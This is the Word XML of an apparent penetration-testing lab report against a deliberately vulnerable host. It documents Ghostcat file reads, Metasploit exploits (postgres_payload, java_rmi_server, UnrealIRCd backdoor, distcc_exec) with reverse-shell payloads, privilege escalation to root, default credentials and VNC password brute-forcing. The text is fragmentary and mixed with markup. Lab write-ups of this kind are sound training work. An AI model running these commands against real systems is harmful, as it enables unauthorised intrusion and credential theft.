        <w:lastRenderedPageBreak/>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meterpreter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7" w:name="_Toc155118312"/>
      <w:r>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC51D3">
        <w:t>8009</w:t>
      </w:r>
      <w:r w:rsidR="000E75D2">
        <w:t xml:space="preserve"> AjP13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA7107" w:rsidRPr="00AA7107">
        <w:t>NVT: Apache Tomcat AJP RCE Vulnerability (Ghostcat)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="12405A6F" w14:textId="77777777" w:rsidR="00662104" w:rsidRDefault="00AA7107" w:rsidP="00662104">
      <w:r>
        <w:t>Please refer to the GVM report page 11</w:t>
      </w:r>
      <w:r w:rsidR="00662104">
        <w:t xml:space="preserve"> Ghostcat Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6F7DDE" w14:textId="4F7244A5" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>GhostCat is a local file inclusion (LFI) vulnerability present through the exploitation of the Apache Jserv Protocol. This means it can be exploited to read restricted web app files on the appserver. Where file uploads are allowed this can also lead to remote code execution (Assuming the documents are stored in the document root). It affects all unpatched versions of Apache Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C7A27" w14:textId="77777777" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF967A" w14:textId="188EC1CF" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>For the POC I am using Tryhackme.com’s new room for the Ghostcat exploit. Rather than fighting with the AJP requests there is a simple tool that can be used to send the required data to exploit the LFI. The tool can be found here. In the following example we have found a Tomcat web server and after an Nmap scan we have found port 8009 to be open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F56EF" w14:textId="6354EA7F" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>The LFI affects the Webapp server so some googling presents the default folders present in this file structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22071446" w14:textId="77777777" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>WEB-INF(d)(web.xml, classes(d), lib(d))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A1883E" w14:textId="77777777" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>index.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF756D3" w14:textId="15210359" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>To look through what we have we can check all of these with our AJP shooter with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA9873" w14:textId="128521E4" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>python3 ajpShooter.py http://192.168.254.186:8080 8009 /WEB-INF/web.xml read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44012F36" w14:textId="0D6EFDA7" w:rsidR="00AA7107" w:rsidRDefault="00662104" w:rsidP="00662104">
      <w:r>
        <w:t>In this instance this results in the reading of the restricted file web.xml that results in the information leak of a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1273D" w14:textId="77777777" w:rsidR="00662104" w:rsidRPr="00AA7107" w:rsidRDefault="00662104" w:rsidP="00662104"/>
    <w:p w14:paraId="25E3CEEF" w14:textId="77777777" w:rsidR="00662104" w:rsidRDefault="00662104" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00662104">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFD4D53" wp14:editId="4B981B2C">
            <wp:extent cx="5731510" cy="3813810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="167181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7077" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3813810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="28" w:name="_Toc155118313"/>
    </w:p>
    <w:p w14:paraId="77F279B1" w14:textId="2C2BC2FB" w:rsidR="007A110C" w:rsidRDefault="007A110C" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Port 5432</w:t>
      </w:r>
      <w:r w:rsidR="00C35A64">
        <w:t xml:space="preserve"> post</w:t>
      </w:r>
      <w:r w:rsidR="008E4971">
        <w:t>gres</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="231D58F6" w14:textId="01D0C294" w:rsidR="009D1027" w:rsidRPr="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>Nmap output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F91CA3" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCA1D0" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C686123" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B633483" w14:textId="77777777" w:rsidR="009D1027" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>|_Not valid after:  2010-04-16T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2534A" w14:textId="77777777" w:rsidR="009D1027" w:rsidRPr="00181A83" w:rsidRDefault="009D1027" w:rsidP="009D1027">
      <w:r>
        <w:t>|_ssl-date: 2024-01-02T09:58:53+00:00; +1s from scanner time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F3AE1" w14:textId="6B306023" w:rsidR="00C107DA" w:rsidRDefault="007A110C" w:rsidP="007A110C">
      <w:r>
        <w:t xml:space="preserve">use exploit/linux/postgres/postgres_payload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86"/>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postgres_payload it defaultedset to using :  [*] Using configured payload linux/x86/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C278E" w14:textId="77777777" w:rsidR="00833660" w:rsidRDefault="00833660" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="00833660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I need to set the local host  set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87"/>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meterpreter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88"/>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postgres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cpe:/a:postgresql:postgresql:8.3.1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It was possible to login into the remote PostgreSQL as user postgres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It was possible to login as user postgres with password "postgres".</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2023-07-25T05:05:58Z</w:t>
      </w:r>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r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cpe:/a:postgresql:postgresql:8.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE6B43" w14:textId="06518FBB"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r w:rsidR="00C31D13">
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F275BF" w14:textId="48170073" w:rsidR="00313769" w:rsidRDefault="00313769" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc155118314"/>
      <w:r w:rsidRPr="00313769">
        <w:t xml:space="preserve">Port 23 </w:t>
      </w:r>
      <w:r w:rsidR="00244791">
        <w:t>telnet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="45A145DB" w14:textId="77777777" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t xml:space="preserve">auxiliary/scanner/telnet/telnet_version  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C63C68" w14:textId="72884894" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t xml:space="preserve">set  RHOST  192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16ECEA" w14:textId="1CA2509D" w:rsidR="00994E96" w:rsidRDefault="00994E96" w:rsidP="00792A92">
      <w:r>
        <w:t>set USERNAME msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787AAF2" w14:textId="05DF592F" w:rsidR="00EE7E34" w:rsidRDefault="00EE7E34" w:rsidP="00792A92">
      <w:r>
        <w:t>set PASSWORD msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AEA95" w14:textId="4DE00C78" w:rsidR="00994E96" w:rsidRDefault="00994E96" w:rsidP="00792A92">
      <w:r w:rsidRPr="00994E96">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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89"/>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30" w:name="_Toc155118315"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00792A92">
        <w:t xml:space="preserve">ort 1099 </w:t>
      </w:r>
      <w:r w:rsidR="00807352">
        <w:t>java_rmi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2FFD07DA" w14:textId="7B345ECA" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t xml:space="preserve">use  exploit/multi/misc/java_rmi_server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0B964DA8" w14:textId="6CD45AA3" w:rsidR="00AA0FF2" w:rsidRDefault="0011222E" w:rsidP="0011222E">
      <w:r w:rsidRPr="0011222E">
        <w:t xml:space="preserve">run   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BFFBF" w14:textId="2F54234B" w:rsidR="00DF50CE" w:rsidRDefault="00B15CC3" w:rsidP="0011222E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DABCB4" wp14:editId="7947291F">
            <wp:extent cx="5731510" cy="4361125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="2109890478"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90478" name="Picture 27" descr="A computer screen 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361125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702D853" w14:textId="77777777" w:rsidR="0025562C" w:rsidRDefault="0025562C" w:rsidP="0011222E"/>
    <w:p w14:paraId="3688F0CF" w14:textId="226AF7D3" w:rsidR="00433EE2" w:rsidRDefault="00433EE2" w:rsidP="009F2B48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5569872A" w14:textId="1ACF004F" w:rsidR="008E1FB7" w:rsidRDefault="008E1FB7" w:rsidP="008E1FB7">
      <w:r w:rsidRPr="008E1FB7">
        <w:t xml:space="preserve">This connected as root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756F5CC" w14:textId="7158BDC6" w:rsidR="000520F2" w:rsidRDefault="000520F2" w:rsidP="008E1FB7">
      <w:r>
        <w:t xml:space="preserve">I used this session to run </w:t>
      </w:r>
      <w:r w:rsidR="00837F9F" w:rsidRPr="00837F9F">
        <w:t>exploit/linux/local/udev_netlink</w:t>
      </w:r>
      <w:r w:rsidR="00837F9F">
        <w:t xml:space="preserve"> using this session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCE351" w14:textId="77777777" w:rsidR="006631BA" w:rsidRDefault="006631BA" w:rsidP="008E1FB7"/>
    <w:p w14:paraId="31017171" w14:textId="3A92335A" w:rsidR="001563F3" w:rsidRDefault="001563F3" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc155118316"/>
      <w:r>
        <w:t>Port 5900</w:t>
      </w:r>
      <w:r w:rsidR="0074513C">
        <w:t xml:space="preserve"> VNC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="079812B2" w14:textId="40561FDD" w:rsidR="002415C7" w:rsidRDefault="002415C7" w:rsidP="002415C7">
      <w:r>
        <w:t xml:space="preserve">Password obtained through brute force attack.  use auxiliary(scanner/vnc/vnc_login)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92"/>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93"/>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94"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95"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pass_file/home/kali/Documents/rockyou.txt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97"/>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2" w:name="_Toc155118317"/>
      <w:r>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidR="0005303B">
        <w:t xml:space="preserve">6667, </w:t>
      </w:r>
      <w:r w:rsidR="00620BAC">
        <w:t>BackDoor v3.2.8.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>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 xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor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99"/>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r w:rsidRPr="00EF6A43">
        <w:t xml:space="preserve">Lets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harrybrown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3" w:name="_Toc155118318"/>
      <w:r>
        <w:t xml:space="preserve">Port 6697 </w:t>
      </w:r>
      <w:r w:rsidR="00833738" w:rsidRPr="00833738">
        <w:t>NVT: UnrealIRCd Authentication Spoong Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="45317291" w14:textId="289AF359" w:rsidR="00F561E8" w:rsidRDefault="00511F27" w:rsidP="00F05F95">
      <w:r w:rsidRPr="00511F27">
        <w:t>UnrealIRCd is prone to authentication spoo</w:t>
      </w:r>
      <w:r w:rsidR="007C077A">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F27">
        <w:t>ng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allows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4" w:name="_Toc155118319"/>
      <w:r>
        <w:t>Port 3632</w:t>
      </w:r>
      <w:r w:rsidR="00501528">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00501528" w:rsidRPr="00501528">
        <w:t>DistCC RCE Vulnerability (CVE-2004-2687)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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DistCC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F6582DA" w14:textId="36C43D85" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>We can use Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5350A762" w14:textId="531999B3" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use exploit/unix/misc/distcc_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C0D3C" w14:textId="11B18D1C" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>we will change the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE42B2D" w14:textId="4EED1C6C" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2CA69" w14:textId="4B3A4731" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9DA061" w14:textId="77777777" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C0783D" w14:textId="77777777" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F34FC1" w14:textId="29B54091" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297AC41B" wp14:editId="66F838C3">
            <wp:extent cx="5731510" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="70123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7275" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3038475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAA314" w14:textId="59D13AF0" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set RHOST 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263419E" w14:textId="705C86C7" w:rsidR="00E10D2A" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A735C" w14:textId="0D729C34" w:rsidR="00263A66" w:rsidRDefault="00E10D2A" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10D2A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3892F4" wp14:editId="101BB23A">
            <wp:extent cx="5731510" cy="2309495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="85979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652" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2309495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA8401" w14:textId="1FF48601" w:rsidR="00263A66" w:rsidRDefault="00263A66" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I was than able to to get in to the root .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F47EB9" w14:textId="0F52FBD3" w:rsidR="00263A66" w:rsidRDefault="00B67BAF" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B67BAF">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D93798F" wp14:editId="48C7BBC5">
            <wp:extent cx="4202349" cy="2178461"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="38468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4922" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4202349" cy="2178461"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CB8A6" w14:textId="77777777" w:rsidR="00546163" w:rsidRDefault="00546163" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D5332C" w14:textId="25718F9B" w:rsidR="00263A66" w:rsidRDefault="00546163" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Testing of Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46BB2D" w14:textId="7E7D2E25" w:rsidR="00546163" w:rsidRDefault="00546163" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I decided to test Armitage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40895441" w14:textId="62E5F541" w:rsidR="00546163" w:rsidRDefault="00546163" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546163">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFEACD6" wp14:editId="5CEA45C4">
            <wp:extent cx="5731510" cy="3415030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15263279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7920" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
